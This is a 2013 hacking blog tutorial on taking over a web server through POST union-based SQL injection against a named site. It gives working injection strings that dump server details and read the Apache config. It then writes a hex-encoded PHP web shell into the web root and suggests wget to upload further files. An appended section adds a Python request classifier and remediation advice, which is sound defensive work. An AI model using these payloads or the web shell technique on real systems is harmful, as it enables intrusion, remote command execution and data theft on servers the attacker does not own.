Sunday, 17 February 2013

After getting a great response to my other tutorials ;) I decided to write a complete tutorial on pwning a machine using SQL injection, even without executing system commands.

Here is the complete video; you can watch it before reading for a better understanding.



Well, first we will start by recognizing the injection point.

So here we go.

http://turfrecon.com/select.php


POST union-based SQL injection

Let's try entering 1' and see what happens...

So now we can start the injection:

1' order by 1#
No Error
1' order by 2#
Error


Getting the required information from the server


1' union all select group_concat(database(),0x3D,user(),0x3D,version(),0x3D,@@datadir)#


With this query we got:
Database : sqlol
username : root@
version : 5.5.24-log
datadir : c:\wamp\bin\mysql\mysql5.5.24\data\

Now let's find out the Apache version.

There are many ways to do that, but I'm going to use the Firefox Tamper Data add-on to check the request header.

So it's Apache 2.2.22.

Now we can guess the Apache config file path, so let's view the file using a SQL query:

1' union all select load_file('c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf')#


Now search for the website name and get the document root:

DocumentRoot "c:/wamp/www/turf/"

1' union all select 0x3c3f2073797374656d28245f4745545b2763275d293b203f3e INTO OUTFILE 'c:/wamp/www/turf/gothacked.php'#


Now check http://turfrecon.com/gothacked.php?c=echo "You Got pwn3d"

Now you can upload any file to the server using the wget command.

NOTE: I WENT THROUGH THE FILES AS PER THIS SCENARIO, WHICH MAY BE DIFFERENT IN DIFFERENT CASES, SO
YOU JUST NEED TO FIND THE DEFAULT FILE PATHS AS PER YOUR SCENARIO; THE REST OF THE COMMANDS WILL
BE THE SAME.
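
For defenders, each stage above leaves a recognizable marker in the POST body. The following added example (not from the original post) classifies form-encoded request bodies by stage and decodes MySQL hex literals to spot PHP hidden inside them; the field name "id" and the sample bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Stages of the chain described above, in the order the tutorial performs them.
RULES = [
    ("column-enumeration", re.compile(r"\border\s+by\s+\d+")),
    ("union-select",       re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("server-recon",       re.compile(r"@@datadir|\bversion\s*\(|\buser\s*\(")),
    ("file-read",          re.compile(r"\bload_file\s*\(")),
    ("file-write",         re.compile(r"\binto\s+(out|dump)file\b")),
]
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){4,})")

def normalize(value):
    """Lowercase, drop inline /* */ comments, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def decoded_hex(value):
    """Decode MySQL 0x... literals so content checks see the real bytes."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(value)]

def classify(post_body):
    """Return the sorted rule names hit by any field of a form-encoded POST body."""
    hits = set()
    for _field, raw in parse_qsl(post_body, keep_blank_values=True):
        value = normalize(raw)
        hits.update(name for name, rx in RULES if rx.search(value))
        # A hex literal that decodes to a PHP open tag is script content, not data.
        if any("<?" in text for text in decoded_hex(value)):
            hits.add("php-in-hex-literal")
    return sorted(hits)

# Constructed request bodies built from the strings shown on this page;
# the field name "id" is an assumption.
SAMPLES = [urlencode({"id": p}) for p in (
    "1",
    "1' order by 2#",
    "1' union all select load_file('c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf')#",
    "1' union all select 0x3c3f2073797374656d28245f4745545b2763275d293b203f3e "
    "INTO OUTFILE 'c:/wamp/www/turf/gothacked.php'#",
)]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify(body), body[:60])
```

Pattern matching like this is only a detection aid; the fixes for the chain itself are a parameterized query in select.php, a database account without the FILE privilege (the page shows the application connecting as root), and a restrictive secure_file_priv setting in MySQL.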

Have Fun Thanxz for Reading

3nj0y H4ck!nG
